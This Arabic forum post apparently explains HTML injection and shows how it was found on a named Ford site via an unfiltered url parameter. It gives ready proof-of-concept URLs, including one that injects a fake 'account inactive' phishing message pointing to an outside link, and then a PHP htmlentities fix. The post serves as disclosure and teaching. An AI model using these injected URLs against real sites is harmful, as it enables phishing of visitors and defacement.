1. المدير العام

    المدير العام أدارة موقع أكتب كود

    شرح طريقة اكتشاف ثغرة HTML Injection في موقع https://www.etis.ford.com

    ماهي ثغرة HTML Injection ؟

    تحدث الثغرة عندما لايتعامل الموقع بشكل صحيح مع البيانات التي يقدمها المستخدم اي لايقوم بعملية التحقق والفلترة مما يعرض الموقع الى حقن اكواد ضارة

    عادة ما يتم استخدام هذه الثغرة في الهندسة الاجتماعية والتصيد الاحتيالي, يتم استغلال الثغرة عن طريق التلاعب بمحتوى الموقع وحقن اكواد ونصوص في الصفحة وتغيير شكلها.

    خطوات اكتشاف ثغرة HTML Injection في موقع https://www.etis.ford.com :

    1. نقوم بفتح الرابط التالي :
    كود:
     https://www.etis.ford.com/externalURL.do?url=
    2. نقوم بحقن الكود التالي في الباراميتر url :
    كود:
     <center><h1>HTML-Injection-Test</h1><marquee>HTML-Injection-Test</marquee><br><h2>Warning</h2><br>
    POC1 : Proof OF Concept​
    كود:
     https://www.etis.ford.com/externalURL.do?url=<center><h1>HTML-Injection-Test</h1><marquee>HTML-Injection-Test</marquee><br><h2>Warning</h2><br>
    [​IMG]

    Source Code
    [​IMG]

    POC2 :​
    كود:
     https://www.etis.ford.com/externalURL.do?url=<center><h1>Sorry, your account is inactive</h1><br/><h2>please visite below link to active your account : <li>https://0xHamza.com</li></h2></center>
    [​IMG]

    POC3 Video :​
    خطر الثغرة :
    • تستخدم في التصيد الاحتيالي
    • الاسائة الى زوار الموقع
    • تشويه الموقع وتغيير محتواه
    كيف يتم اصلاح الثغرة :
    الطريقة سهله جداً هي عمل فلتره للبيانات المارة بين حقول البيانات, و هناك دوال في لغة php متخصصة لهذا الأمر, مثل دالة htmlentities

    ماهي دالة htmlentities ؟
    تقوم هذه الدالة بفلترة البيانات المارة الى الموقع ولن يتم تنفيذ اي كود ضار.
    كود:
     <?php echo htmlentities($_GET['url']); ?>
    المراجع : https://www.acunetix.com/vulnerabilities/web/html-injection
     
جاري تحميل الصفحة...
المشاركات المتشابهة - شرح طريقة اكتشاف
  1. المدير العام
    الردود:
    0
    المشاهدات:
    226
  2. المدير العام
    الردود:
    0
    المشاهدات:
    241
  3. المدير العام
    الردود:
    0
    المشاهدات:
    204
  4. المدير العام
    الردود:
    0
    المشاهدات:
    218
  5. المدير العام
    الردود:
    0
    المشاهدات:
    273